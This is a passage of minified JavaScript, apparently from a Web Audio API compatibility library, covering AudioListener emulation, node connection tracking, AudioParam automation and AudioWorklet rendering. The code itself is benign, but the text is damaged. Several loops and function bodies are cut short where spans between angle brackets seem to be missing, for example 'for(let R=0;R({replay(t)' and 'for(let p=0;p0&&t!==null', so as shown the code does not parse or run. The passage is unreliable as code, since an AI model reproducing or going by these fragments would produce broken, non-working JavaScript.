0?Promise.resolve(s):n(r,o)}}},To=(e,t,n,r,o,s,a,c)=>(i,u)=>{const d=u.listener,l=()=>{const _=new Float32Array(1),E=t(u,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"speakers",numberOfInputs:9}),y=a(u);let C=!1,M=[0,0,-1,0,1,0],I=[0,0,0];const N=()=>{if(C)return;C=!0;const U=r(u,256,9,0);U.onaudioprocess=({inputBuffer:R})=>{const x=[s(R,_,0),s(R,_,1),s(R,_,2),s(R,_,3),s(R,_,4),s(R,_,5)];x.some((O,L)=>O!==M[L])&&(d.setOrientation(...x),M=x);const D=[s(R,_,6),s(R,_,7),s(R,_,8)];D.some((O,L)=>O!==I[L])&&(d.setPosition(...D),I=D)},E.connect(U)},P=U=>R=>{R!==M[U]&&(M[U]=R,d.setOrientation(...M))},k=U=>R=>{R!==I[U]&&(I[U]=R,d.setPosition(...I))},B=(U,R,x)=>{const D=n(u,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",offset:R});D.connect(E,0,U),D.start(),Object.defineProperty(D.offset,"defaultValue",{get(){return R}});const O=e({context:i},y,D.offset,Ye,Ce);return c(O,"value",L=>()=>L.call(O),L=>W=>{try{L.call(O,W)}catch(G){if(G.code!==9)throw 
G}N(),y&&x(W)}),O.cancelAndHoldAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.cancelAndHoldAtTime),O.cancelScheduledValues=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.cancelScheduledValues),O.exponentialRampToValueAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.exponentialRampToValueAtTime),O.linearRampToValueAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.linearRampToValueAtTime),O.setTargetAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.setTargetAtTime),O.setValueAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.setValueAtTime),O.setValueCurveAtTime=(L=>y?()=>{throw o()}:(...W)=>{const G=L.apply(O,W);return N(),G})(O.setValueCurveAtTime),O};return{forwardX:B(0,0,P(0)),forwardY:B(1,0,P(1)),forwardZ:B(2,-1,P(2)),positionX:B(6,0,k(0)),positionY:B(7,0,k(1)),positionZ:B(8,0,k(2)),upX:B(3,0,P(3)),upY:B(4,1,P(4)),upZ:B(5,0,P(5))}},{forwardX:h,forwardY:m,forwardZ:w,positionX:f,positionY:p,positionZ:g,upX:v,upY:A,upZ:T}=d.forwardX===void 0?l():d;return{get forwardX(){return h},get forwardY(){return m},get forwardZ(){return w},get positionX(){return f},get positionY(){return p},get positionZ(){return g},get upX(){return v},get upY(){return A},get upZ(){return T}}},We=e=>"context"in e,Ne=e=>We(e[0]),le=(e,t,n,r)=>{for(const o of e)if(n(o)){if(r)return!1;throw Error("The set contains at least one similar element.")}return e.add(t),!0},Xt=(e,t,[n,r],o)=>{le(e,[t,n,r],s=>s[0]===t&&s[1]===n,o)},Zt=(e,[t,n,r],o)=>{const s=e.get(t);s===void 0?e.set(t,new Set([[n,r]])):le(s,[n,r],a=>a[0]===n,o)},En=e=>"inputs"in e,mt=(e,t,n,r)=>{if(En(t)){const o=t.inputs[r];return e.connect(o,n,0),[o,n,0]}return e.connect(t,n,r),[t,n,r]},An=(e,t,n)=>{for(const r of e)if(r[0]===t&&r[1]===n)return e.delete(r),r;return null},No=(e,t,n)=>qe(e,r=>r[0]===t&&r[1]===n),bn=(e,t)=>{if(!be(e).delete(t))throw new Error("Missing the expected event listener.")},Cn=(e,t,n)=>{const r=K(e,t),o=qe(r,s=>s[0]===n);return r.size===0&&e.delete(t),o},gt=(e,t,n,r)=>{En(t)?e.disconnect(t.inputs[r],n,0):e.disconnect(t,n,r)},X=e=>K(dn,e),Ee=e=>K(hn,e),ue=e=>ut.has(e),xe=e=>!we.has(e),Kt=(e,t)=>new Promise(n=>{if(t!==null)n(!0);else{const r=e.createScriptProcessor(256,1,1),o=e.createGain(),s=e.createBuffer(1,2,44100),a=s.getChannelData(0);a[0]=1,a[1]=1;const c=e.createBufferSource();c.buffer=s,c.loop=!0,c.connect(r).connect(e.destination),c.connect(o),c.disconnect(o),r.onaudioprocess=i=>{const u=i.inputBuffer.getChannelData(0);Array.prototype.some.call(u,d=>d===1)?n(!0):n(!1),c.stop(),r.onaudioprocess=null,c.disconnect(r),r.disconnect(e.destination)},c.start()}}),ot=(e,t)=>{const n=new Map;for(const r of e)for(const o of r){const s=n.get(o);n.set(o,s===void 0?1:s+1)}n.forEach((r,o)=>t(o,r))},Ve=e=>"context"in e,Mo=e=>{const t=new Map;e.connect=(n=>(r,o=0,s=0)=>{const a=Ve(r)?n(r,o,s):n(r,o),c=t.get(r);return c===void 0?t.set(r,[{input:s,output:o}]):c.every(i=>i.input!==s||i.output!==o)&&c.push({input:s,output:o}),a})(e.connect.bind(e)),e.disconnect=(n=>(r,o,s)=>{if(n.apply(e),r===void 0)t.clear();else if(typeof r=="number")for(const[a,c]of t){const i=c.filter(u=>u.output!==r);i.length===0?t.delete(a):t.set(a,i)}else if(t.has(r))if(o===void 0)t.delete(r);else{const a=t.get(r);if(a!==void 0){const c=a.filter(i=>i.output!==o&&(i.input!==s||s===void 0));c.length===0?t.delete(r):t.set(r,c)}}for(const[a,c]of 
t)c.forEach(i=>{Ve(a)?e.connect(a,i.output,i.input):e.connect(a,i.output)})})(e.disconnect)},Oo=(e,t,n,r)=>{const{activeInputs:o,passiveInputs:s}=Te(t),{outputs:a}=q(e),c=be(e),i=u=>{const d=X(e),l=Ee(t);if(u){const h=Cn(s,e,n);Xt(o,e,h,!1),!r&&!ue(e)&&d.connect(l,n)}else{const h=No(o,e,n);Zt(s,h,!1),!r&&!ue(e)&&d.disconnect(l,n)}};return le(a,[t,n],u=>u[0]===t&&u[1]===n,!0)?(c.add(i),se(e)?Xt(o,e,[n,i],!0):Zt(s,[e,n,i],!0),!0):!1},So=(e,t,n,r)=>{const{activeInputs:o,passiveInputs:s}=q(t),a=An(o[r],e,n);return a===null?[wn(s,e,n,r)[2],!1]:[a[2],!0]},Ro=(e,t,n)=>{const{activeInputs:r,passiveInputs:o}=Te(t),s=An(r,e,n);return s===null?[Cn(o,e,n)[1],!1]:[s[2],!0]},At=(e,t,n,r,o)=>{const[s,a]=So(e,n,r,o);if(s!==null&&(bn(e,s),a&&!t&&!ue(e)&>(X(e),X(n),r,o)),se(n)){const{activeInputs:c}=q(n);ft(n,c)}},bt=(e,t,n,r)=>{const[o,s]=Ro(e,n,r);o!==null&&(bn(e,o),s&&!t&&!ue(e)&&X(e).disconnect(Ee(n),r))},Io=(e,t)=>{const n=q(e),r=[];for(const o of n.outputs)Ne(o)?At(e,t,...o):bt(e,t,...o),r.push(o[0]);return n.outputs.clear(),r},ko=(e,t,n)=>{const r=q(e),o=[];for(const s of r.outputs)s[1]===n&&(Ne(s)?At(e,t,...s):bt(e,t,...s),o.push(s[0]),r.outputs.delete(s));return o},Lo=(e,t,n,r,o)=>{const s=q(e);return Array.from(s.outputs).filter(a=>a[0]===n&&(r===void 0||a[1]===r)&&(o===void 0||a[2]===o)).map(a=>(Ne(a)?At(e,t,...a):bt(e,t,...a),s.outputs.delete(a),a[0]))},Po=(e,t,n,r,o,s,a,c,i,u,d,l,h,m,w,f)=>class extends u{constructor(g,v,A,T){super(A),this._context=g,this._nativeAudioNode=A;const _=d(g);l(_)&&n(Kt,()=>Kt(_,f))!==!0&&Mo(A),dn.set(this,A),mn.set(this,new Set),g.state!=="closed"&&v&&ye(this),e(this,T,A)}get channelCount(){return this._nativeAudioNode.channelCount}set channelCount(g){this._nativeAudioNode.channelCount=g}get channelCountMode(){return this._nativeAudioNode.channelCountMode}set channelCountMode(g){this._nativeAudioNode.channelCountMode=g}get channelInterpretation(){return this._nativeAudioNode.channelInterpretation}set channelInterpretation(g){this._nativeAudioNode.channelInterpretation=g}get context(){return this._context}get numberOfInputs(){return this._nativeAudioNode.numberOfInputs}get numberOfOutputs(){return this._nativeAudioNode.numberOfOutputs}connect(g,v=0,A=0){if(v<0||v>=this._nativeAudioNode.numberOfOutputs)throw o();const T=d(this._context),_=w(T);if(h(g)||m(g))throw s();if(We(g)){const C=X(g);try{const I=mt(this._nativeAudioNode,C,v,A),N=xe(this);(_||N)&&this._nativeAudioNode.disconnect(...I),this.context.state!=="closed"&&!N&&xe(g)&&ye(g)}catch(I){throw I.code===12?s():I}if(t(this,g,v,A,_)){const I=i([this],g);ot(I,r(_))}return g}const E=Ee(g);if(E.name==="playbackRate"&&E.maxValue===1024)throw a();try{this._nativeAudioNode.connect(E,v),(_||xe(this))&&this._nativeAudioNode.disconnect(E,v)}catch(C){throw C.code===12?s():C}if(Oo(this,g,v,_)){const C=i([this],g);ot(C,r(_))}}disconnect(g,v,A){let T;const _=d(this._context),E=w(_);if(g===void 0)T=Io(this,E);else if(typeof g=="number"){if(g<0||g>=this.numberOfOutputs)throw o();T=ko(this,E,g)}else{if(v!==void 0&&(v<0||v>=this.numberOfOutputs)||We(g)&&A!==void 0&&(A<0||A>=g.numberOfInputs))throw o();if(T=Lo(this,E,g,v,A),T.length===0)throw s()}for(const y of T){const C=i([this],y);ot(C,c)}}},xo=(e,t,n,r,o,s,a,c,i,u,d,l,h)=>(m,w,f,p=null,g=null)=>{const v=new Hr(f.defaultValue),A=w?r(v):null,T={get defaultValue(){return f.defaultValue},get maxValue(){return p===null?f.maxValue:p},get minValue(){return g===null?f.minValue:g},get value(){return f.value},set 
value(_){f.value=_,T.setValueAtTime(_,m.context.currentTime)},cancelAndHoldAtTime(_){if(typeof f.cancelAndHoldAtTime=="function")A===null&&v.flush(m.context.currentTime),v.add(o(_)),f.cancelAndHoldAtTime(_);else{const E=Array.from(v).pop();A===null&&v.flush(m.context.currentTime),v.add(o(_));const y=Array.from(v).pop();f.cancelScheduledValues(_),E!==y&&y!==void 0&&(y.type==="exponentialRampToValue"?f.exponentialRampToValueAtTime(y.value,y.endTime):y.type==="linearRampToValue"?f.linearRampToValueAtTime(y.value,y.endTime):y.type==="setValue"?f.setValueAtTime(y.value,y.startTime):y.type==="setValueCurve"&&f.setValueCurveAtTime(y.values,y.startTime,y.duration))}return T},cancelScheduledValues(_){return A===null&&v.flush(m.context.currentTime),v.add(s(_)),f.cancelScheduledValues(_),T},exponentialRampToValueAtTime(_,E){if(_===0)throw new RangeError;if(!Number.isFinite(E)||E<0)throw new RangeError;return A===null&&v.flush(m.context.currentTime),v.add(a(_,E)),f.exponentialRampToValueAtTime(_,E),T},linearRampToValueAtTime(_,E){return A===null&&v.flush(m.context.currentTime),v.add(c(_,E)),f.linearRampToValueAtTime(_,E),T},setTargetAtTime(_,E,y){return A===null&&v.flush(m.context.currentTime),v.add(i(_,E,y)),f.setTargetAtTime(_,E,y),T},setValueAtTime(_,E){return A===null&&v.flush(m.context.currentTime),v.add(u(_,E)),f.setValueAtTime(_,E),T},setValueCurveAtTime(_,E,y){const C=_ instanceof Float32Array?_:new Float32Array(_);if(l!==null&&l.name==="webkitAudioContext"){const M=E+y,I=m.context.sampleRate,N=Math.ceil(E*I),P=Math.floor(M*I),k=P-N,B=new Float32Array(k);for(let R=0;R({replay(t){for(const n of e)if(n.type==="exponentialRampToValue"){const{endTime:r,value:o}=n;t.exponentialRampToValueAtTime(o,r)}else if(n.type==="linearRampToValue"){const{endTime:r,value:o}=n;t.linearRampToValueAtTime(o,r)}else if(n.type==="setTarget"){const{startTime:r,target:o,timeConstant:s}=n;t.setTargetAtTime(o,r,s)}else if(n.type==="setValue"){const{startTime:r,value:o}=n;t.setValueAtTime(o,r)}else if(n.type==="setValueCurve"){const{duration:r,startTime:o,values:s}=n;t.setValueCurveAtTime(s,o,r)}else throw new Error("Can't apply an unknown automation.")}});class Tn{constructor(t){this._map=new Map(t)}get size(){return this._map.size}entries(){return this._map.entries()}forEach(t,n=null){return this._map.forEach((r,o)=>t.call(n,r,o,this))}get(t){return this._map.get(t)}has(t){return this._map.has(t)}keys(){return this._map.keys()}values(){return this._map.values()}}const Bo={channelCount:2,channelCountMode:"explicit",channelInterpretation:"speakers",numberOfInputs:1,numberOfOutputs:1,parameterData:{},processorOptions:{}},Do=(e,t,n,r,o,s,a,c,i,u,d,l,h,m)=>class extends t{constructor(f,p,g){var v;const A=c(f),T=i(A),_=d({...Bo,...g});h(_);const E=lt.get(A),y=E?.get(p),C=T||A.state!=="closed"?A:(v=a(A))!==null&&v!==void 0?v:A,M=o(C,T?null:f.baseLatency,u,p,y,_),I=T?r(p,_,y):null;super(f,!0,M,I);const N=[];M.parameters.forEach((k,B)=>{const U=n(this,T,k);N.push([B,U])}),this._nativeAudioWorkletNode=M,this._onprocessorerror=null,this._parameters=new Tn(N),T&&e(A,this);const{activeInputs:P}=s(this);l(M,P)}get onprocessorerror(){return this._onprocessorerror}set onprocessorerror(f){const p=typeof f=="function"?m(this,f):null;this._nativeAudioWorkletNode.onprocessorerror=p;const g=this._nativeAudioWorkletNode.onprocessorerror;this._onprocessorerror=g!==null&&g===p?f:g}get parameters(){return this._parameters===null?this._nativeAudioWorkletNode.parameters:this._parameters}get port(){return 
this._nativeAudioWorkletNode.port}};function Fe(e,t,n,r,o){if(typeof e.copyFromChannel=="function")t[n].byteLength===0&&(t[n]=new Float32Array(128)),e.copyFromChannel(t[n],r,o);else{const s=e.getChannelData(r);if(t[n].byteLength===0)t[n]=s.slice(o,o+128);else{const a=new Float32Array(s.buffer,o*Float32Array.BYTES_PER_ELEMENT,128);t[n].set(a)}}}const Nn=(e,t,n,r,o)=>{typeof e.copyToChannel=="function"?t[n].byteLength!==0&&e.copyToChannel(t[n],r,o):t[n].byteLength!==0&&e.getChannelData(r).set(t[n],o)},je=(e,t)=>{const n=[];for(let r=0;r{const n=K(dt,e),r=X(t);return K(n,r)},Vo=async(e,t,n,r,o,s,a)=>{const c=t===null?Math.ceil(e.context.length/128)*128:t.length,i=r.channelCount*r.numberOfInputs,u=o.reduce((p,g)=>p+g,0),d=u===0?null:n.createBuffer(u,c,n.sampleRate);if(s===void 0)throw new Error("Missing the processor constructor.");const l=q(e),h=await Wo(n,e),m=je(r.numberOfInputs,r.channelCount),w=je(r.numberOfOutputs,o),f=Array.from(e.parameters.keys()).reduce((p,g)=>({...p,[g]:new Float32Array(128)}),{});for(let p=0;p0&&t!==null)for(let g=0;g{Fe(t,f,g,i+v,p)});for(let g=0;gl.activeInputs[T].size===0?[]:A),v=a(p/n.sampleRate,n.sampleRate,()=>h.process(g,w,f));if(d!==null)for(let A=0,T=0;A(p,g,v)=>{const A=new WeakMap;let T=null;const _=async(E,y)=>{let C=d(E),M=null;const I=Et(C,y),N=Array.isArray(g.outputChannelCount)?g.outputChannelCount:Array.from(g.outputChannelCount);if(l===null){const P=N.reduce((R,x)=>R+x,0),k=o(y,{channelCount:Math.max(1,P),channelCountMode:"explicit",channelInterpretation:"discrete",numberOfOutputs:Math.max(1,P)}),B=[];for(let R=0;R{const W=new h(O,Math.ceil(E.context.length/128)*128,y.sampleRate),G=[],he=[];for(let j=0;j{const H=s(W,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",offset:j.value});return await m(W,j,H.offset),H})),me=r(W,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"speakers",numberOfInputs:Math.max(1,x+D)});for(let j=0;jw(E,W,j))),f(W)})(),y,g,N,v,u)}const P=await T,k=n(y,{buffer:null,channelCount:2,channelCountMode:"max",channelInterpretation:"speakers",loop:!1,loopEnd:0,loopStart:0,playbackRate:1}),[B,U,R]=M;P!==null&&(k.buffer=P,k.start(0)),k.connect(B);for(let x=0,D=0;x(n,r)=>{const o=t.get(n);if(o!==void 0)return o;const s=e.get(n);if(s!==void 0)return s;try{const a=r();return a instanceof Promise?(e.set(n,a),a.catch(()=>!1).then(c=>(e.delete(n),t.set(n,c),c))):(t.set(n,a),a)}catch{return t.set(n,!1),!1}},$o=e=>(t,n,r)=>e(n,t,r),Go=e=>(t,n,r=0,o=0)=>{const s=t[r];if(s===void 0)throw e();return Ve(n)?s.connect(n,0,o):s.connect(n,0)},zo={channelCount:2,channelCountMode:"max",channelInterpretation:"speakers",offset:1},qo=(e,t,n,r,o,s,a)=>class extends e{constructor(i,u){const d=o(i),l={...zo,...u},h=r(d,l),m=s(d),w=m?n():null;super(i,!1,h,w),this._constantSourceNodeRenderer=w,this._nativeConstantSourceNode=h,this._offset=t(this,m,h.offset,Ye,Ce),this._onended=null}get offset(){return this._offset}get onended(){return this._onended}set onended(i){const u=typeof i=="function"?a(this,i):null;this._nativeConstantSourceNode.onended=u;const d=this._nativeConstantSourceNode.onended;this._onended=d!==null&&d===u?i:d}start(i=0){if(this._nativeConstantSourceNode.start(i),this._constantSourceNodeRenderer!==null&&(this._constantSourceNodeRenderer.start=i),this.context.state!=="closed"){ye(this);const 
u=()=>{this._nativeConstantSourceNode.removeEventListener("ended",u),se(this)&&He(this)};this._nativeConstantSourceNode.addEventListener("ended",u)}}stop(i=0){this._nativeConstantSourceNode.stop(i),this._constantSourceNodeRenderer!==null&&(this._constantSourceNodeRenderer.stop=i)}},Ho=(e,t,n,r,o)=>()=>{const s=new WeakMap;let a=null,c=null;const i=async(u,d)=>{let l=n(u);const h=Et(l,d);if(!h){const m={channelCount:l.channelCount,channelCountMode:l.channelCountMode,channelInterpretation:l.channelInterpretation,offset:l.offset.value};l=t(d,m),a!==null&&l.start(a),c!==null&&l.stop(c)}return s.set(d,l),h?await e(d,u.offset,l.offset):await r(d,u.offset,l.offset),await o(u,d,l),l};return{set start(u){a=u},set stop(u){c=u},render(u,d){const l=s.get(d);return l!==void 0?Promise.resolve(l):i(u,d)}}},Yo=e=>t=>(e[0]=t,e[0]),Xo=()=>new DOMException("","DataCloneError"),Jt=e=>{const{port1:t,port2:n}=new MessageChannel;return new Promise(r=>{const o=()=>{n.onmessage=null,t.close(),n.close(),r()};n.onmessage=()=>o();try{t.postMessage(e,[e])}finally{o()}})},Zo=(e,t,n,r,o,s,a,c,i,u,d)=>(l,h)=>{const m=a(l)?l:s(l);if(o.has(h)){const w=n();return Promise.reject(w)}try{o.add(h)}catch{}return t(i,()=>i(m))?m.decodeAudioData(h).then(w=>(Jt(h).catch(()=>{}),t(c,()=>c(w))||d(w),e.add(w),w)):new Promise((w,f)=>{const p=async()=>{try{await Jt(h)}catch{}},g=v=>{f(v),p()};try{m.decodeAudioData(h,v=>{typeof v.copyFromChannel!="function"&&(u(v),_n(v)),e.add(v),p().then(()=>w(v))},v=>{g(v===null?r():v)})}catch(v){g(v)}})},Ko=(e,t,n,r,o,s,a,c)=>(i,u)=>{const d=t.get(i);if(d===void 0)throw new Error("Missing the expected cycle count.");const l=s(i.context),h=c(l);if(d===u){if(t.delete(i),!h&&a(i)){const m=r(i),{outputs:w}=n(i);for(const f of w)if(Ne(f)){const p=r(f[0]);e(m,p,f[1],f[2])}else{const p=o(f[0]);m.connect(p,f[1])}}}else t.set(i,d-u)},Jo=e=>(t,n,r,o)=>e(t[o],s=>s[0]===n&&s[1]===r),Qo=e=>(t,n)=>{e(t).delete(n)},es=e=>"delayTime"in e,ts=(e,t,n)=>function r(o,s){const a=We(s)?s:n(e,s);if(es(a))return[];if(o[0]===a)return[o];if(o.includes(a))return[];const{outputs:c}=t(a);return Array.from(c).map(i=>r([...o,a],i[0])).reduce((i,u)=>i.concat(u),[])},Pe=(e,t,n)=>{const r=t[n];if(r===void 0)throw e();return r},ns=e=>(t,n=void 0,r=void 0,o=0)=>n===void 0?t.forEach(s=>s.disconnect()):typeof n=="number"?Pe(e,t,n).disconnect():Ve(n)?r===void 0?t.forEach(s=>s.disconnect(n)):o===void 0?Pe(e,t,r).disconnect(n,0):Pe(e,t,r).disconnect(n,0,o):r===void 0?t.forEach(s=>s.disconnect(n)):Pe(e,t,r).disconnect(n,0),rs=()=>new DOMException("","EncodingError"),os=e=>t=>new Promise((n,r)=>{if(e===null){r(new SyntaxError);return}const o=e.document.head;if(o===null)r(new SyntaxError);else{const s=e.document.createElement("script"),a=new Blob([t],{type:"application/javascript"}),c=URL.createObjectURL(a),i=e.onerror,u=()=>{e.onerror=i,URL.revokeObjectURL(c)};e.onerror=(d,l,h,m,w)=>{if(l===c||l===e.location.href&&h===1&&m===1)return u(),r(w),!1;if(i!==null)return i(d,l,h,m,w)},s.onerror=()=>{u(),r(new SyntaxError)},s.onload=()=>{u(),n()},s.src=c,s.type="module",o.appendChild(s)}}),ss=e=>class{constructor(n){this._nativeEventTarget=n,this._listeners=new WeakMap}addEventListener(n,r,o){if(r!==null){let s=this._listeners.get(r);s===void 0&&(s=e(this,r),typeof r=="function"&&this._listeners.set(r,s)),this._nativeEventTarget.addEventListener(n,s,o)}}dispatchEvent(n){return this._nativeEventTarget.dispatchEvent(n)}removeEventListener(n,r,o){const s=r===null?void 0:this._listeners.get(r);this._nativeEventTarget.removeEventListener(n,s===void 
0?null:s,o)}},as=e=>(t,n,r)=>{Object.defineProperties(e,{currentFrame:{configurable:!0,get(){return Math.round(t*n)}},currentTime:{configurable:!0,get(){return t}}});try{return r()}finally{e!==null&&(delete e.currentFrame,delete e.currentTime)}},is=e=>async t=>{try{const n=await fetch(t);if(n.ok)return[await n.text(),n.url]}catch{}throw e()},cs=(e,t)=>n=>t(e,n),us=e=>t=>{const n=e(t);if(n.renderer===null)throw new Error("Missing the renderer of the given AudioNode in the audio graph.");return n.renderer},ls=e=>t=>{var n;return(n=e.get(t))!==null&&n!==void 0?n:0},ds=e=>t=>{const n=e(t);if(n.renderer===null)throw new Error("Missing the renderer of the given AudioParam in the audio graph.");return n.renderer},fs=e=>t=>e.get(t),Z=()=>new DOMException("","InvalidStateError"),hs=e=>t=>{const n=e.get(t);if(n===void 0)throw Z();return n},ps=(e,t)=>n=>{let r=e.get(n);if(r!==void 0)return r;if(t===null)throw new Error("Missing the native OfflineAudioContext constructor.");return r=new t(1,1,44100),e.set(n,r),r},ms=e=>t=>{const n=e.get(t);if(n===void 0)throw new Error("The context has no set of AudioWorkletNodes.");return n},gs=()=>new DOMException("","InvalidAccessError"),ws=(e,t,n,r,o,s)=>a=>(c,i)=>{const u=e.get(c);if(u===void 0){if(!a&&s(c)){const d=r(c),{outputs:l}=n(c);for(const h of l)if(Ne(h)){const m=r(h[0]);t(d,m,h[1],h[2])}else{const m=o(h[0]);d.disconnect(m,h[1])}}e.set(c,i)}else e.set(c,u+i)},vs=e=>t=>e!==null&&t instanceof e,_s=e=>t=>e!==null&&typeof e.AudioNode=="function"&&t instanceof e.AudioNode,ys=e=>t=>e!==null&&typeof e.AudioParam=="function"&&t instanceof e.AudioParam,Es=(e,t)=>n=>e(n)||t(n),As=e=>t=>e!==null&&t instanceof e,bs=e=>e!==null&&e.isSecureContext,Cs=(e,t,n,r)=>class extends e{constructor(s,a){const c=n(s),i=t(c,a);if(r(c))throw new TypeError;super(s,!0,i,null),this._nativeMediaStreamAudioSourceNode=i}get mediaStream(){return this._nativeMediaStreamAudioSourceNode.mediaStream}},Ts=(e,t,n,r,o)=>class extends r{constructor(a={}){if(o===null)throw new Error("Missing the native AudioContext constructor.");let c;try{c=new o(a)}catch(d){throw d.code===12&&d.message==="sampleRate is not in range"?t():d}if(c===null)throw n();if(!Ao(a.latencyHint))throw new TypeError(`The provided value '${a.latencyHint}' is not a valid enum value of type AudioContextLatencyCategory.`);if(a.sampleRate!==void 0&&c.sampleRate!==a.sampleRate)throw t();super(c,2);const{latencyHint:i}=a,{sampleRate:u}=c;if(this._baseLatency=typeof c.baseLatency=="number"?c.baseLatency:i==="balanced"?512/u:i==="interactive"||i===void 0?256/u:i==="playback"?1024/u:Math.max(2,Math.min(128,Math.round(i*u/128)))*128/u,this._nativeAudioContext=c,o.name==="webkitAudioContext"?(this._nativeGainNode=c.createGain(),this._nativeOscillatorNode=c.createOscillator(),this._nativeGainNode.gain.value=1e-37,this._nativeOscillatorNode.connect(this._nativeGainNode).connect(c.destination),this._nativeOscillatorNode.start()):(this._nativeGainNode=null,this._nativeOscillatorNode=null),this._state=null,c.state==="running"){this._state="suspended";const d=()=>{this._state==="suspended"&&(this._state=null),c.removeEventListener("statechange",d)};c.addEventListener("statechange",d)}}get baseLatency(){return this._baseLatency}get state(){return this._state!==null?this._state:this._nativeAudioContext.state}close(){return this.state==="closed"?this._nativeAudioContext.close().then(()=>{throw 
e()}):(this._state==="suspended"&&(this._state=null),this._nativeAudioContext.close().then(()=>{this._nativeGainNode!==null&&this._nativeOscillatorNode!==null&&(this._nativeOscillatorNode.stop(),this._nativeGainNode.disconnect(),this._nativeOscillatorNode.disconnect()),Eo(this)}))}resume(){return this._state==="suspended"?new Promise((a,c)=>{const i=()=>{this._nativeAudioContext.removeEventListener("statechange",i),this._nativeAudioContext.state==="running"?a():this.resume().then(a,c)};this._nativeAudioContext.addEventListener("statechange",i)}):this._nativeAudioContext.resume().catch(a=>{throw a===void 0||a.code===15?e():a})}suspend(){return this._nativeAudioContext.suspend().catch(a=>{throw a===void 0?e():a})}},Ns=(e,t,n,r,o,s)=>class extends n{constructor(c,i){super(c),this._nativeContext=c,pn.set(this,c),r(c)&&o.set(c,new Set),this._destination=new e(this,i),this._listener=t(this,c),this._onstatechange=null}get currentTime(){return this._nativeContext.currentTime}get destination(){return this._destination}get listener(){return this._listener}get onstatechange(){return this._onstatechange}set onstatechange(c){const i=typeof c=="function"?s(this,c):null;this._nativeContext.onstatechange=i;const u=this._nativeContext.onstatechange;this._onstatechange=u!==null&&u===i?c:u}get sampleRate(){return this._nativeContext.sampleRate}get state(){return this._nativeContext.state}},wt=e=>{const t=new Uint32Array([1179011410,40,1163280727,544501094,16,131073,44100,176400,1048580,1635017060,4,0]);try{const n=e.decodeAudioData(t.buffer,()=>{});return n===void 0?!1:(n.catch(()=>{}),!0)}catch{}return!1},Ms=(e,t)=>(n,r,o)=>{const s=new Set;return n.connect=(a=>(c,i=0,u=0)=>{const d=s.size===0;if(t(c))return a.call(n,c,i,u),e(s,[c,i,u],l=>l[0]===c&&l[1]===i&&l[2]===u,!0),d&&r(),c;a.call(n,c,i),e(s,[c,i],l=>l[0]===c&&l[1]===i,!0),d&&r()})(n.connect),n.disconnect=(a=>(c,i,u)=>{const d=s.size>0;if(c===void 0)a.apply(n),s.clear();else if(typeof c=="number"){a.call(n,c);for(const h of s)h[1]===c&&s.delete(h)}else{t(c)?a.call(n,c,i,u):a.call(n,c,i);for(const h of s)h[0]===c&&(i===void 0||h[1]===i)&&(u===void 0||h[2]===u)&&s.delete(h)}const l=s.size===0;d&&l&&o()})(n.disconnect),n},ce=(e,t,n)=>{const r=t[n];r!==void 0&&r!==e[n]&&(e[n]=r)},Me=(e,t)=>{ce(e,t,"channelCount"),ce(e,t,"channelCountMode"),ce(e,t,"channelInterpretation")},Os=e=>e===null?null:e.hasOwnProperty("AudioBuffer")?e.AudioBuffer:null,Ct=(e,t,n)=>{const r=t[n];r!==void 0&&r!==e[n].value&&(e[n].value=r)},Ss=e=>{e.start=(t=>{let n=!1;return(r=0,o=0,s)=>{if(n)throw Z();t.call(e,r,o,s),n=!0}})(e.start)},Mn=e=>{e.start=(t=>(n=0,r=0,o)=>{if(typeof o=="number"&&o<0||r<0||n<0)throw new RangeError("The parameters can't be negative.");t.call(e,n,r,o)})(e.start)},On=e=>{e.stop=(t=>(n=0)=>{if(n<0)throw new RangeError("The parameter can't be negative.");t.call(e,n)})(e.stop)},Rs=(e,t,n,r,o,s,a,c,i,u,d)=>(l,h)=>{const m=l.createBufferSource();return Me(m,h),Ct(m,h,"playbackRate"),ce(m,h,"buffer"),ce(m,h,"loop"),ce(m,h,"loopEnd"),ce(m,h,"loopStart"),t(n,()=>n(l))||Ss(m),t(r,()=>r(l))||i(m),t(o,()=>o(l))||u(m,l),t(s,()=>s(l))||Mn(m),t(a,()=>a(l))||d(m,l),t(c,()=>c(l))||On(m),e(l,m),m},Is=e=>e===null?null:e.hasOwnProperty("AudioContext")?e.AudioContext:e.hasOwnProperty("webkitAudioContext")?e.webkitAudioContext:null,ks=(e,t)=>(n,r,o)=>{const s=n.destination;if(s.channelCount!==r)try{s.channelCount=r}catch{}o&&s.channelCountMode!=="explicit"&&(s.channelCountMode="explicit"),s.maxChannelCount===0&&Object.defineProperty(s,"maxChannelCount",{value:r});const 
a=e(n,{channelCount:r,channelCountMode:s.channelCountMode,channelInterpretation:s.channelInterpretation,gain:1});return t(a,"channelCount",c=>()=>c.call(a),c=>i=>{c.call(a,i);try{s.channelCount=i}catch(u){if(i>s.maxChannelCount)throw u}}),t(a,"channelCountMode",c=>()=>c.call(a),c=>i=>{c.call(a,i),s.channelCountMode=i}),t(a,"channelInterpretation",c=>()=>c.call(a),c=>i=>{c.call(a,i),s.channelInterpretation=i}),Object.defineProperty(a,"maxChannelCount",{get:()=>s.maxChannelCount}),a.connect(s),a},Ls=e=>e===null?null:e.hasOwnProperty("AudioWorkletNode")?e.AudioWorkletNode:null,Ps=e=>{const{port1:t}=new MessageChannel;try{t.postMessage(e)}finally{t.close()}},xs=(e,t,n,r,o)=>(s,a,c,i,u,d)=>{if(c!==null)try{const l=new c(s,i,d),h=new Map;let m=null;if(Object.defineProperties(l,{channelCount:{get:()=>d.channelCount,set:()=>{throw e()}},channelCountMode:{get:()=>"explicit",set:()=>{throw e()}},onprocessorerror:{get:()=>m,set:w=>{typeof m=="function"&&l.removeEventListener("processorerror",m),m=typeof w=="function"?w:null,typeof m=="function"&&l.addEventListener("processorerror",m)}}}),l.addEventListener=(w=>(...f)=>{if(f[0]==="processorerror"){const p=typeof 